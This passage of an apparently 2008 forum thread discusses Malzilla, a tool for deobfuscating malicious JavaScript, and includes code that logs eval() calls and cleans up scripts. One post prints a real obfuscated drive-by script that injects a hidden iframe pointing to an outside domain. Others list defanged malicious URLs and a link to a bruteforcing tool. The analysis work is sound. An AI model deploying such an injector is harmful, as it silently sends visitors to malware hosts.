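            self._form["fields"].append({"name": a.get("name") or "", "type": itype,
                                         "value": a.get("value") or ""})
        elif tag == "textarea":
            self._textarea = {"name": a.get("name") or "", "type": "textarea", "value": ""}
            self._form["fields"].append(self._textarea)
        elif tag == "select":
            self._select = {"name": a.get("name") or "", "type": "select", "value": None}
            self._form["fields"].append(self._select)
        elif tag == "option" and self._select is not None:
            self._end_option()     # </option> is usually omitted
            self._option = {"value": a.get("value"), "selected": "selected" in a}

    def handle_data(self, data):
        if self._textarea is not None:
            self._textarea["value"] += data
        elif self._option is not None and self._option["value"] is None:
            self._option["value"] = data.strip()   # no value attr: text is the value

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None
        elif tag == "textarea":
            self._textarea = None
        elif tag in ("option", "select"):
            self._end_option()
            if tag == "select":
                self._select = None

    def _end_option(self):  # first option is the default; a selected one overrides
        if self._option is not None and self._select is not None:
            if self._select["value"] is None or self._option["selected"]:
                self._select["value"] = self._option["value"] or ""
        self._option = None


def build_request(form, base_url=""):
    """Step 3: the string builder for the fields the form expects."""
    body = urlencode([(f["name"], f["value"] or "") for f in form["fields"] if f["name"]])
    url = urljoin(base_url, form["action"])
    if form["method"] == "GET":
        return {"method": "GET", "url": url + ("?" + body if body else ""), "body": ""}
    return {"method": "POST", "url": url, "body": body}


def extract_forms(html, base_url=""):
    p = FormExtractor()
    p.feed(html)
    p.close()
    return [dict(f, request=build_request(f, base_url)) for f in p.forms]


if __name__ == "__main__":
    for f in extract_forms(SAMPLE_HTML, "http://host.example/index.html"):
        print(f["method"], f["name"] or "(unnamed)", f["request"])
```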
Title: Re: MalZilla
Post by: sowhat-x on March 16, 2008, 10:10:34 pm
...quickly uploaded both 'Form' and 'Judas' to Googlepages as well,
password is simply 'password',without quotes...
http://sowhatx.googlepages.com/FormFinal.rar
http://sowhatx.googlepages.com/Judas.rar

Note that some AV products flag 'Form' as a 'Hacktool',
since it was meant for bruteforcing html pages,he-he...  :D

Edit:Uploaded 'Form Scalpel' as well,same password...
(the extra vb dlls might need regsvr32 first):
http://sowhatx.googlepages.com/FormScalpel.rar
Title: Re: MalZilla
Post by: bobby on March 24, 2008, 09:14:03 pm
Sorry for the late reply... I was pretty busy last couple of days.
New Malzilla uploaded:
https://sourceforge.net/project/showfiles.php?group_id=203466

We are now using hacked SpiderMonkey.
Please also take a look at the new tutorials.

@sowhat-x
Thanks for the uploads. Got them all ;)
Title: Re: MalZilla
Post by: MysteryFCM on March 24, 2008, 09:22:48 pm
Nice one cheers :)
Title: Re: MalZilla
Post by: sowhat-x on March 25, 2008, 11:23:08 am
Heh,compared with earlier v0.91/v0.92 builds,it's miles ahead...  ;D

...made a single pdf from the first 3 Malzilla's tutorials for 'offline' usage:
now why would anyone need them if being offline in the first place,
that's something beyond my imagination,he-he...but anyway... :D
http://rapidshare.com/files/102201005/MalzillaIntro.pdf.html
Alternatively:
http://www.megaupload.com/?d=IFMPWEVK

Wasn't really sure on how to handle the scripts in the newest two documents:
on the one hand,I couldn't get them to properly fit as 'static' printed images,
and I also didn't really like the idea of handling them as pdf 'attachments'.
I preferred to leave them out for the time being,if any other suggestions/ideas arise...

P.S:...ehmm...felt a bit embarrassed...i mean,regarding the 'about' box:
as it's JohnC that's doing all the 'real'/hard work...
Title: Re: MalZilla
Post by: MysteryFCM on March 25, 2008, 12:01:29 pm
Just got some time to look at the tutorials too and they're great dude :) (good to see the code I had problems with in there too as it may have confused others too  :-[).
Title: Re: MalZilla
Post by: tjs on March 25, 2008, 05:59:18 pm
Great stuff!

When you use malzilla on dual monitors, and malzilla is in focus on the secondary monitor the splash screen stays on top on the primary monitor.

Title: Re: MalZilla
Post by: bobby on March 25, 2008, 06:02:46 pm
@MysteryFCM

There is no offense meant by putting your script there under such a title. It is just that you found an extraordinary example.
Breaking the unicode sequences in such a way as in your script - I hadn't seen anything like that before, and I'm really happy that you found it.
It was a reason to add the concatenating function to Malzilla and a good lesson (for me) that one must not forget to take a look at some simple things, not always searching for clues in some complicated functions.

I tried to blog about some interesting "species", but Blogspot is a real PITA when it comes to text formatting:
http://malzilla.blogspot.com/
I gave up on that blog.

@sowhat-x

Do not undervalue your contribution to Malzilla and to this discussion.
I do not have a lot of feedback on Malzilla, and I appreciate every single post here. That gives me some motivation to work further.
Apart from this thread here, there is one more guy posting in the forum provided by SourceForge, one contact per email (asking for a Linux version which I promised to finish, but never got time to get it to the same level as the Windows version) and some feedback on Ethical Hacker Network.
So, I appreciate your feedback a lot.

@TJS
I got some other reports on strange behavior of that splash screen (try Alt + Tab on a single monitor).
I'll probably remove it from the next upload, as I really can't find what's wrong, as the code looks OK.


@all
Does the new handling of eval() function do a better job for you than previous hacks?
Title: Re: MalZilla
Post by: tjs on March 25, 2008, 06:24:51 pm
* I havent had any issues with the new eval() handling.
* I suggest that you put an option to not display splash screen instead of removing it (this seems to be a standard in software today).. that way you can still have a splash :)

TJS
Title: Re: MalZilla
Post by: bobby on March 25, 2008, 06:33:29 pm
@TJS

Try the script from Tutorial 5 on Malzilla's website to see the power of the new eval() handling.
After that, try the same script with older versions (pre-release 3) if you still have them (I've deleted them from the server).
In older releases you could only get some info by taking a look at the variables in debugger.
With new version you will get the complete script :)
Title: Re: MalZilla
Post by: tjs on March 26, 2008, 12:19:47 am
Very nice!!

Does this introduce any additional security risk? I'll buy beer for anyone that finds a way to get malzilla to execute a payload using some scripting magic and discloses it to bobby in a responsible manner.

Another crazy suggestion:

How about a scripting API so that I can start using malzilla in an automated way against a list of URLs? Perhaps to be able to input a list of URLs and have malzilla automatically deobfuscate each one until certain conditions are met (ex. till a string [.exe|GET|etc] is found, or after n iterations) while writing each 'layer' to disk.

8)
TJS
Title: Re: MalZilla
Post by: cjeremy on March 26, 2008, 12:41:08 am
Quote
How about a scripting API so that I can start using malzilla in an automated way against a list of URLs? Perhaps to be able to input a list of URLs and have malzilla automatically deobfuscate each one until certain conditions are met (ex. till a string [.exe|GET|etc] is found, or after n iterations) while writing each 'layer' to disk.

Why not just use the SpiderMonkey API and a wrapper script to automate this for your standard JavaScript obfuscation?  Before I started using Malzilla (which I love now) for most of my analysis I would use Perl wrapper scripts and the SpiderMonkey engine, pipe this output into a database which would then allow me to perform relational comparisons....  Not the end-all be-all solution, but done fairly easily.  Then for any obfuscated scripts you can't parse with your current script libraries use Malzilla, translating your findings into your automated scripts for future occurrences.  I say again, I love using Malzilla and Bobby has done an outstanding job, but an automated solution would be optimal....  On the other hand maybe an open API would boost support and use of Bobby's creation, maybe???
Title: Re: MalZilla
Post by: bobby on March 26, 2008, 05:18:46 am
@TJS

If SpiderMonkey itself is vulnerable, then the Malzilla would also be vulnerable.
There is no additional risk added by this hack.
All that this hack is doing is to log what the eval() function got as arguments.
Each call will produce a file in eval_temp folder.
After script completes, Malzilla will eliminate duplicates in eval_temp, and show you the rest.

About automation, I did think about it (using PScript from Malzilla), but it is not so easy.
Malzilla is a multi-threaded application, and a lot of events are based on callback functions.
Using them in an environment that is not object-oriented is a real pain.

Example: when you run a script in the decoder, Malzilla's main thread (the user interface) does not wait for the decoding thread to finish (that would freeze the interface). When the thread finishes, it calls a callback function in Malzilla, letting it know that the results are waiting to be displayed.

That just reminded me that there is a bug in Malzilla :)
If you run a script which takes some time to finish, and create a new Decoder tab before the results are there, the results will be displayed on the new tab, not on the tab from which you sent them.

@cjeremy
Can you make a short tutorial on how you are running Malzilla under Wine on Linux? Please.
Title: Re: MalZilla
Post by: MysteryFCM on March 26, 2008, 02:03:24 pm
Quote from: bobby
@MysteryFCM

There is no offense meant by putting your script there under such a title. It is just that you found an extraordinary example.
Breaking the unicode sequences in such a way as in your script - I hadn't seen anything like that before, and I'm really happy that you found it.
It was a reason to add a concatenating function to Malzilla and a good lesson (for me) that one must not forget to take a look at some simple things, not always searching for clues in some complicated functions.

I tried to blog about some interesting "species", but Blogspot is a real PITA when it comes to text formatting:
http://malzilla.blogspot.com/
I gave up on that blog.

No offense taken :)
Title: Re: MalZilla
Post by: cjeremy on March 27, 2008, 12:38:12 am
@bobby

Not much of a tutorial I am afraid.  It is very simple if you can get the prerequisite wine installed and running.  There are a million tutorials for installing wine and specific instructions can depend upon which distro you're using.  For Ubuntu/Kubuntu Gutsy (7.10) it is fairly simple, just:

1.  sudo wget http://wine.budgetdedicated.com/apt/sources.list.d/gutsy.list -O /etc/apt/sources.list.d/winehq.list
2.  sudo apt-get update
3.  sudo apt-get install wine

Once wine is installed then it as simple as follows:

1.   wget http://superb-west.dl.sourceforge.net/sourceforge/malzilla/malzilla_0.9.3pre4.zip  (from your favorite sourceforge mirror)
2.   mv malzilla_0.9.3pre4.zip ~/.wine/drive_c/Program\ Files/
3.   cd ~/.wine/drive_c/Program\ Files/
4.   unzip malzilla_0.9.3pre4.zip
5.   cd malzilla_0.9.3pre4/
6.   wine malzilla.exe &  ( execute it with wine )

This works for me, but as with anything in the world of software your mileage may vary!

--jeremy
Title: Re: MalZilla
Post by: bobby on March 27, 2008, 06:16:25 pm
Guys, I apologize, but something is wrong with the previous upload.
When creating the ZIP to upload, my file manager didn't add the folders, just the files.
This is very important, as some functions do not work without all the temp folders.
I've fixed this so that Malzilla now creates all the missing folders if these are not already there.
Some other interface bugs are fixed too.

Please download the new ZIP (0.9.2.5) from SourceForge.
Title: Re: MalZilla
Post by: JohnC on April 03, 2008, 04:07:29 pm
Is it possible to have the space between "Send script to decoder" and "Find objects" made smaller. Also the space below "Find objects", so that the main download part can be a tiny bit bigger. The bits I am talking about have black lines by them in the picture below.

(http://img247.imageshack.us/img247/1706/17827789pf5.png)

Also could the space between "URL", "User Agent", "Referrer" and "Cookies" be made a little smaller so that the main download part can be a little bigger.
Title: Re: MalZilla
Post by: bobby on April 03, 2008, 06:40:16 pm
@JohnC

Done.
I also made it so that you can collapse/expand that panel.


@cjeremy

May I get your permission to post your tutorial on Malzilla's web site?
Title: Re: MalZilla
Post by: cjeremy on April 04, 2008, 01:51:30 am
@bobby

No worries, go for it!  Not much of tutorial though ;)
Title: Re: MalZilla
Post by: sowhat-x on April 04, 2008, 01:30:11 pm
...he-he, I really like the way that Malzilla has pretty much evolved into being THE standard,
when it comes to analyzing infected/obfuscated webpages...  :)
http://www.securityfocus.com/blogs/716
Title: Re: MalZilla
Post by: tjs on April 11, 2008, 08:50:18 pm
Nice catch sowhat-x... I am really proud that I'm involved with this project in some way.
Keep up the great work, bobby. :)

TJS
Title: Re: MalZilla
Post by: bobby on April 11, 2008, 09:05:11 pm
Thanks guys :)

I'll try to get another upload this weekend. Nothing special changed. There is one more redirection method detected in HTTP headers (thanks JohnC), and a little GUI redesign to get more space for page source on the Download tab.
I also started some other additions (take a look at right-click menu), but it is still not complete (just internal scripts are working for now).

One more thing is missing in case/log mode, and I'll try to fix it tomorrow.

Next Friday I'm going on vacation for 3 weeks, and I won't have an internet connection (nor a PC at all :) )
Title: Re: MalZilla
Post by: tjs on April 14, 2008, 11:40:27 pm
Another feature request:

How about associating hxxp with malzilla so that we can embed hxxp links in webpages and have them automatically load up with malzilla? That'll save us from having to do lots of copy/pasting from MDL (and other sites) into Malzilla :P

Just another random idea for after your vacations :)

TJS
Title: Re: MalZilla
Post by: Orac on April 15, 2008, 01:39:04 pm
 :-[ I only found out about Malzilla yesterday, it's certainly more efficient than Lynx, and I love the decoding functions, sure beats doing it the hard way.

An idea, we're seeing more and more FTP RFIs than just a few months ago, any possibility of porting Malzilla for FTP grabs ?
Title: Re: MalZilla
Post by: bobby on April 15, 2008, 03:06:26 pm
@tjs
Doesn't the Clipboard monitor do the job similar to what you request?

@Orac
I'll do something about FTP grabs, but I can do it when I come back from vacation.
Title: Re: MalZilla
Post by: tjs on April 15, 2008, 04:08:11 pm
I've had a few bad experiences with the clipboard monitor so I haven't experimented with it too much. I'll check it out.
Title: Re: MalZilla
Post by: bobby on April 15, 2008, 07:16:00 pm
Clipboard monitor can be annoying sometimes.
It monitors clipboard for links (keywords can be defined on Settings tab).

In the beginning, it was a problem that it grabbed all the links twice (double entries in the list).
I've solved that by clearing the clipboard after getting the links.
Solution for Malzilla, but it was a problem for other apps running.

Now, it does not clear the clipboard (other apps should not experience problems while Malzilla is running), but it tries to detect double entries and delete them from the list.

The current problem now is that Clipboard Monitor does also detect internal copy/paste of links inside Malzilla (I do not find this useful) as Malzilla is using the Windows' clipboard.
Title: Re: MalZilla
Post by: bobby on April 18, 2008, 07:50:43 pm
Sorry guys, I didn't succeed in preparing the new release before I go on vacation (tomorrow morning).
It is full of half-baked functions, and I would not like to upload it in such a state.

See you in 3 weeks (3 weeks without a PC :) ).
Title: Re: MalZilla
Post by: MysteryFCM on April 18, 2008, 07:52:16 pm
Have fun dude :)
Title: Re: MalZilla
Post by: JohnC on April 18, 2008, 07:56:36 pm
Have a nice time away :)
Title: Re: MalZilla
Post by: bobby on April 18, 2008, 08:16:46 pm
Thanks guys.

The following is not official release (but you can get it if you want to try it):
http://rapidshare.com/files/108547702/malzilla.exe.html
You will need the dll files from the latest official version of Malzilla:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804&release_id=587544

What is half-baked:
- you will see "Run script" in right-click menu (works on selected text, or on whole text if no selection is made). Internal scripts are working, external are not implemented at all
- the state of "Use referrer" on Download page is not saved in INI file for the next session
- Download panel - button panels can be hidden (click anywhere between the buttons) to extend the space for downloaded source and HTTP headers. There are problems with some combinations of resizing the form and hide/unhide the panels - buttons are not always restored to the right position
- some JavaScripts can break Malzilla if "Debug" is used. It does not break if "Run script" is used. It manifests in cleaning all the settings, URL history etc. This bug affects all the previous versions of Malzilla. I can't do a lot here, except preventing Malzilla from overwriting the settings files with empty ones. This is not an exploit for Malzilla. It is just that the Debugger does not finish working (gets stuck), and you need to kill Malzilla. Malzilla will receive the termination signal, and it will do the closing operations (saving settings) which are empty because the thread containing the settings (GUI) is not responding. All the settings files will be overwritten with empty files.

There may be something else that I can't recall at the moment.

Cheers,
bobby
Title: Re: MalZilla
Post by: Orac on April 19, 2008, 02:25:47 pm
Hope you have a great vacation Bobby

I've had another idea for Malzilla, within the HTTP header section adding the resolved DNS and connection information would be very helpful, especially when faced with redirects. Example:
Quote
Resolving ess.trix.net... 200.201.192.41, 200.201.192.31
Connecting to ess.trix.net[200.201.192.41]:80... failed: No route to host.
Connecting to ess.trix.net[200.201.192.31]:80... connected.
Title: Re: MalZilla
Post by: tjs on April 29, 2008, 06:01:37 pm
Looks like SANS is now using Malzilla as part of their training
http://www.sans.org/training/description.php?mid=54

TJS
Title: Re: MalZilla
Post by: jimmyleo on May 10, 2008, 03:05:22 am
hi bobby:

Code:
<script>
ADDE21259CAE84 = "parseIn";
ADDE21259CAE84 += "t";
A3CB8FA3E0 = "String.fr";
A3CB8FA3E0 += "omC";
A3CB8FA3E0 += "h";
A3CB8FA3E0 += "a";
A3CB8FA3E0 += "rCode";
function DAC027B90(EAA256797A)
{
    var D8BE9398766CD = 676;
    D8BE9398766CD = D8BE9398766CD - 660;
    D59FA5 = eval(ADDE21259CAE84 + "(EAA256797A,D8BE9398766CD)");
    return (D59FA5);
}
function B06AA5(B08FD4DEDD6A39)
{
    var E24A10 = 122;
    E24A10 = E24A10 - 120;
    var D7502F1FF7C = "";
    for (FECA5EB378C6D0E = 0; FECA5EB378C6D0E < B08FD4DEDD6A39.length; FECA5EB378C6D0E += E24A10)
    {
        D7502F1FF7C += ( eval(A3CB8FA3E0 + "(DAC027B90(B08FD4DEDD6A39.substr(FECA5EB378C6D0E,E24A10)))"));
    }
    eval(D7502F1FF7C);
}
B06AA5("76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
</script>

this script may cause Malzilla's decoder to stay in the "Working..." state. I chose the "replace eval() with" method and filled in document.write, as you know,
but it stays in this state..

and I decoded it manually.
Code:
vyn=document.getElementById('kig');
if(vyn==null)
{
         document.write('<iframe id=kig src=http://verossa.info style=display:none></iframe>');
}
Title: Re: MalZilla
Post by: bobby on May 10, 2008, 08:35:08 pm
Hi jimmyleo,

Use the last build and choose the "Leave as is" option. You will get the same result as the one you got manually.
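Added example, not Malzilla's own code and not from any poster in this thread: a Node.js script that does what bobby describes the eval() hack doing in his March 26 post (record each argument eval() receives, drop the duplicates, show what is left) on jimmyleo's sample above, and stubs just enough of document for the last layer to run. The names __log, matchParen, instrumentEvals and runLogged are this example's own. Malzilla does the logging inside SpiderMonkey; here eval(X) is rewritten in the source to eval(__log(X)) so that the call stays a direct eval and keeps the obfuscator's local variables in scope.

```javascript
// jimmyleo's obfuscated sample from the post above, <script> tags removed.
const OBFUSCATED = `
ADDE21259CAE84 = "parseIn";
ADDE21259CAE84 += "t";
A3CB8FA3E0 = "String.fr";
A3CB8FA3E0 += "omC";
A3CB8FA3E0 += "h";
A3CB8FA3E0 += "a";
A3CB8FA3E0 += "rCode";
function DAC027B90(EAA256797A)
{
    var D8BE9398766CD = 676;
    D8BE9398766CD = D8BE9398766CD - 660;
    D59FA5 = eval(ADDE21259CAE84 + "(EAA256797A,D8BE9398766CD)");
    return (D59FA5);
}
function B06AA5(B08FD4DEDD6A39)
{
    var E24A10 = 122;
    E24A10 = E24A10 - 120;
    var D7502F1FF7C = "";
    for (FECA5EB378C6D0E = 0; FECA5EB378C6D0E < B08FD4DEDD6A39.length; FECA5EB378C6D0E += E24A10)
    {
        D7502F1FF7C += ( eval(A3CB8FA3E0 + "(DAC027B90(B08FD4DEDD6A39.substr(FECA5EB378C6D0E,E24A10)))"));
    }
    eval(D7502F1FF7C);
}
B06AA5("76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
`;

// Index of the ')' matching the '(' at src[open]; string literals are
// skipped so parentheses inside quotes do not count.
function matchParen(src, open) {
  let depth = 0, quote = null;
  for (let j = open; j < src.length; j++) {
    const c = src[j];
    if (quote) {
      if (c === '\\') j++;                 // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") quote = c;
    else if (c === '(') depth++;
    else if (c === ')' && --depth === 0) return j;
  }
  throw new Error('unbalanced parentheses after eval(');
}

// Rewrite eval(X) -> eval(__log(X)); recurses into X for nested evals.
// Naive text scan: it does not skip eval( inside comments or string literals.
function instrumentEvals(src) {
  let out = '', i = 0;
  for (;;) {
    const at = src.indexOf('eval(', i);
    if (at === -1) return out + src.slice(i);
    if (at > 0 && /[\w$.]/.test(src[at - 1])) { // myeval( or obj.eval(: leave alone
      out += src.slice(i, at + 5);
      i = at + 5;
      continue;
    }
    const close = matchParen(src, at + 4);
    out += src.slice(i, at + 5) + '__log(' + instrumentEvals(src.slice(at + 5, close)) + '))';
    i = close + 1;
  }
}

// Run the instrumented script with a stand-in document so the final layer
// (which expects a DOM) executes and its document.write() is captured.
function runLogged(src) {
  const seen = new Set();
  const evals = [];   // unique eval() arguments, first-seen order (Malzilla drops duplicates too)
  const writes = [];  // everything the script tried to document.write()
  const __log = (s) => {
    if (typeof s !== 'string') return s;          // eval(non-string) just returns it
    if (!seen.has(s)) { seen.add(s); evals.push(s); }
    return instrumentEvals(s);                    // deeper layers get logged as well
  };
  const document = {
    getElementById: () => null,                   // "element not there yet", as the script expects
    write: (html) => { writes.push(String(html)); },
  };
  // Function bodies are sloppy-mode, so the sample's implicit globals work.
  new Function('__log', 'document', instrumentEvals(src))(__log, document);
  return { evals, writes };
}

const result = runLogged(OBFUSCATED);
console.log('unique eval() arguments:\n' + result.evals.join('\n'));
console.log('document.write():', result.writes);
```

It prints three unique strings, in first-seen order: the String.fromCharCode(...) expression, the parseInt(...) expression, and the decoded payload, whose document.write() is the same hidden iframe jimmyleo decoded by hand. Reassigning the global eval to a wrapper would not work for this sample: the call would become an indirect eval running in global scope, and EAA256797A and D8BE9398766CD (locals of the obfuscator's functions) would be out of reach, which is why the rewrite keeps the original eval keyword in place.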
Title: Re: MalZilla
Post by: jimmyleo on May 16, 2008, 02:32:25 pm
yeap, got it ;D

and another bug? maybe

link following:
Code:
hxxp://xindizhi88.com/ai/Yes.htm
JSEncode, at first glance. And MZ only decodes part of it; the rest is messy characters.

jimi :)
Title: Re: MalZilla
Post by: bobby on May 16, 2008, 04:33:14 pm
Thanks for reporting this bug.
It has something to do with conversion between ASCII and Unicode.
The script decodes OK until the first non-English character appears, and it goes into a mess after that.

Please use this online JScript.encode decoder until I get this bug fixed:
http://www.greymagic.com/security/tools/decoder/decoder.asp
Title: Re: MalZilla
Post by: bobby on June 15, 2008, 02:47:42 pm
A little preview of what I'm working on:
http://rapidshare.com/files/122620084/malzilla_preview.zip.html

News:
- handling HTTPS by using OpenSSL (saw malware last week which was hosted on HTTPS)
- minor GUI changes
- internal minimalistic HTML render (still does not handle all HTML tags)
- better Format Code (at least I think it is better). Major difference is that FC will not touch anything inside quotation marks. FOR loops handling is also done better.
- Link Parser - it does Line select now, a click on a line will select the whole line
- Tools - some improvements and new edit functions
- Download tab - please test new option in tab's right-click menu: New tab (next step). Current URL will be a referrer on new tab, and cookies are set. Note that cookies set by scripts in HTML code are not handled, just cookies from HTTP headers are processed by Malzilla

Bugs:
- JSEncode decoder goes messy with Unicode chars in code (JSEncode does not work with Unicode, one needs to translate the code page, and even worse - one needs to know which code page was in use)
- probably more bugs
- probably even more bugs

ToDo:
- implement more DOM objects (href, location etc.)
- stop working on Malzilla if Symantec and SANS guys keep cropping the screenshots so that the title "Malzilla by bobby" gets cut off from the pictures they post in the blogs. More than that, make a JScript that Symantec and SANS guys can't decode with current Malzilla, and tell them you won't improve Malzilla until they post the whole screenshots
- or implement nag screens which will affect just the Symantec guys (and others who feel embarrassed if they mention that they are using Malzilla) :)

Regressions:
- some JS functions not working anymore (alert, dialogs)

To explain the regression with some JS functions - since moving the complete interaction with SpiderMonkey into a separate thread, and as a thread isn't a part of the GUI (the GUI is part of the main thread), SpiderMonkey can't access any GUI-related things anymore. This is the next thing I'll work on.
Title: Re: MalZilla
Post by: MysteryFCM on June 15, 2008, 02:54:30 pm
Can you upload it here please? (I've tried numerous times but I'll be damned if I can get the RS captcha correct  ??? )
Title: Re: MalZilla
Post by: bobby on June 15, 2008, 03:05:24 pm
http://malzilla.sf.net/malzilla_preview.zip

Too big to be attached to a post here. I've uploaded to Malzilla site.

Please report bugs, both in GUI and in handling JavaScripts.
If anyone wants to send me a script which can't be handled, please save it from Malzilla as a project file (Settings > Download > Add project info to saved files) or please provide the complete URL, referrer, User Agent and cookies.
A lot of scripts depend on these parameters, and can't be deobfuscated if these are not known.
Title: Re: MalZilla
Post by: MysteryFCM on June 15, 2008, 03:16:22 pm
Nice one, cheers :)
Title: Re: MalZilla
Post by: sowhat-x on June 15, 2008, 05:39:41 pm
In a real hurry at the moment, can't really reply properly...  :-\
Quote
Too big to be attached to a post here.
For future reference:
since people have complained more than a few times about it, he-he...  :D
I've increased attachments' file size up to 2mb...

Quote
- handling HTTPS by using OpenSSL
Won't say more - that's really damned good news  8)
Just something that quickly came to mind,
not a suggestion, just trying to give out ideas...
maybe you'd also like to have a look at MatrixSSL:
http://www.matrixssl.org/
It's 'supposedly' more lightweight/easy to use than OpenSSL...

Quote
- probably more bugs
- probably even more bugs
Lmao!  ;D
We all put 100% trust in you -> but I guess you already knew that...  ;)
So, I translate this to:
Quote
- probably more of excellent hard work from bobby
Title: Re: MalZilla
Post by: Orac on June 15, 2008, 09:14:30 pm
I've had a quick play with the preview, really like the "New tab (next step)" and can see that coming in useful.

I've had problems with HTTPS a few times in recent months, this addition will be a major help.

Also like the mini HTML view that should prove to have its uses.

Will comment further when I've used it for a few days.


Many thanks for all the hard work you do for us all :)

Title: Re: MalZilla
Post by: tjs on June 16, 2008, 07:14:18 pm
I got a new bug to report today...

Found a drive-by that pads the script with nulls... Malzilla really didn't like this, and neither did TextPad's search/replace function.

Here is the original malicious page:
hxxp://ch.moneybee.net/blog/kehker/hker.htm

Let me know if it goes down and you need a copy attached.

Ex:
3C00000000000068000000007400000000006D00006C00003E0000000000000D0A0000000000002000000000000000200000000000003C7300000063000000000000007200000000000000690000007000000000000000007400000000000000

TJS
Title: Re: MalZilla
Post by: bobby on June 16, 2008, 08:11:02 pm
@tjs
Attached to this post is an updated EXE with additional function to remove nulls.
Right click on text box containing NULLs (Decoder, Download, any other text box) > Run Script (internal) > Remove NULLs
Title: Re: MalZilla
Post by: bobby on June 16, 2008, 08:26:25 pm
Forgot to say - Concatenate function is updated too.
Now it can handle even something like the following:
"T" + 'e' & "s" + 't'
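Added example, not Malzilla's code: the two clean-ups bobby mentions in his two posts above, Remove NULLs and Concatenate, written as Node.js functions over a constructed input (the PADDED string below is made up for this example; it is not tjs's page). The identifiers removeNulls, concatenate, unescapeBody and cleanUp are the example's own. It folds "..." and '...' literals with backslash escapes, chained by + or &. One caveat for a JScript analyst: & is bitwise AND in JScript, not concatenation, so folding across & is only correct for VBScript; it is handled here because bobby's mixed "T" + 'e' & "s" + 't' form is the case under discussion.

```javascript
// Constructed sample, not taken from any real page: a script padded with NUL
// bytes, with its strings split into mixed-quote fragments joined by + and &.
const PADDED = 'v\u0000ar x = "T" + \'e\' & "s" + \'t\';\u0000\u0000' +
  'document.write("<scr" + \'ipt src=\' + "http://example.invalid/a.js" + \'>\');';

// Drop every NUL byte. The script engine tolerates them, but they break
// plain-text search/replace and any decoder that works on the text.
function removeNulls(text) {
  return text.replace(/\u0000/g, '');
}

// One string literal, "..." or '...', honouring backslash escapes.
const LITERAL = String.raw`("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')`;
// Two literals joined by + (JScript) or & (VBScript), like "T" + 'e' & "s" + 't'.
const PAIR = new RegExp(LITERAL + String.raw`\s*[+&]\s*` + LITERAL);

// Literal body -> runtime string: handles \n \r \t \xHH \uHHHH and \<any char>.
function unescapeBody(body) {
  return body.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[\s\S])/g, (m, e) => {
    if (e.length > 1) return String.fromCharCode(parseInt(e.slice(1), 16)); // \xHH or \uHHHH
    return { n: '\n', r: '\r', t: '\t' }[e] ?? e;   // \" \' \\ and the rest map to themselves
  });
}

// Fold the leftmost pair of adjacent literals into one double-quoted literal
// (JSON escaping) and repeat until nothing changes, so chains of any length fold.
function concatenate(text) {
  for (;;) {
    const next = text.replace(PAIR, (m, a, b) =>
      JSON.stringify(unescapeBody(a.slice(1, -1)) + unescapeBody(b.slice(1, -1))));
    if (next === text) return text;
    text = next;
  }
}

// Order matters: a NUL inside a fragment would otherwise survive into the folded literal.
function cleanUp(text) {
  return concatenate(removeNulls(text));
}

console.log(cleanUp(PADDED));
```

This is a text-level approximation, not a tokenizer: a quote inside a comment or a regex literal can confuse it, and it leaves alone any concatenation that involves a variable, which needs actual execution rather than pattern matching.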
Title: Re: MalZilla
Post by: tjs on June 16, 2008, 10:45:20 pm
You rock!
Title: Re: MalZilla
Post by: Orac on June 17, 2008, 12:18:17 pm
One small point.

With Malzilla 0.9.3pre5 we have a box that can be checked for "Auto-redirect" under Settings/Download

This box is missing from the new version, and instead we get a pop up asking if we want to follow the redirect.

Personally I am finding this pop up to be a bit of a pain, would it be possible to have the Auto-redirect check box back as per 0.9.3pre5
Title: Re: MalZilla
Post by: Orac on June 17, 2008, 01:20:02 pm
 :-[ Oops, forget my post above, just found it on the download page  :-[
/me books an appointment with the opticians
Title: Re: MalZilla
Post by: bobby on June 17, 2008, 03:36:24 pm
Hi Orac,

It is my fault I didn't mention it.
I found it more useful to be on the first page.

I'm not known as someone who is taking notes of what is done/changed/etc. You can see that from the changelogs :)

Next few days I'll do a review of the code. I need to take a look if everything is logged in log/case mode.
After that I'll push another official download on Malzilla's website.

Any suggestions that can be implemented with less work/modifications?

After this version, I'll really go for implementing more DOM objects.
The easiest way is to have them as templates that implement new DOM objects in realtime.
This way anyone can make his own templates which would implement the missing DOM objects.
Guess some of you have no clue what I'm talking about, but it will be much easier when I show that with examples.
Title: Re: MalZilla
Post by: Orac on June 17, 2008, 04:58:56 pm
Quote from: Bobby
Any suggestions that can be implemented with less work/modifications?

I have no idea how much work or modifications would be involved with either of these, but do have two "wish list" items

1. Porting Malzilla for FTP.
2. In the HTTP header section adding resolved DNS and IP connection(s).
Title: Re: MalZilla
Post by: bobby on June 17, 2008, 06:44:18 pm
Hi Orac,

What exactly would you want for FTP?
Just the possibility to download a file from FTP, or a full-featured FTP client (two panels - local and remote folder etc.)?
Just getting a file from FTP isn't so hard to do. For a FileZilla-like client I would need a lot of time.

About resolving DNS and such - I have no clue how to do that. I know almost nothing about the theory of DNS resolution, lookups and such.
Title: Re: MalZilla
Post by: sowhat-x on June 17, 2008, 10:39:16 pm
Maybe Synapse is of interest...
it provides support for both FTP/DNS, works under both win32/*nix...
Heh, just noticed it also has some kind of support for OpenSSL as well:
http://www.ararat.cz/synapse/doku.php/features

One older nice piece of code that I keep around for reference,
usable under both win32/*nix... in C though:
http://benoit.papillault.free.fr/c/socket/dns.c
Title: Re: MalZilla
Post by: MysteryFCM on June 18, 2008, 03:37:15 am
Bobby,
For resolving you can use the Windows API :)

gethostbyname
gethostbyaddr

Both a part of the wsock32 DLL

I wrote an AX to do it for my server if you'd like a copy?
Title: Re: MalZilla
Post by: sowhat-x on June 18, 2008, 07:05:19 am
...gethostbyname/gethostbyaddr functions are actually... "Berkeley sockets" API, lol...  ;)
http://en.wikipedia.org/wiki/Berkeley_sockets
Title: Re: MalZilla
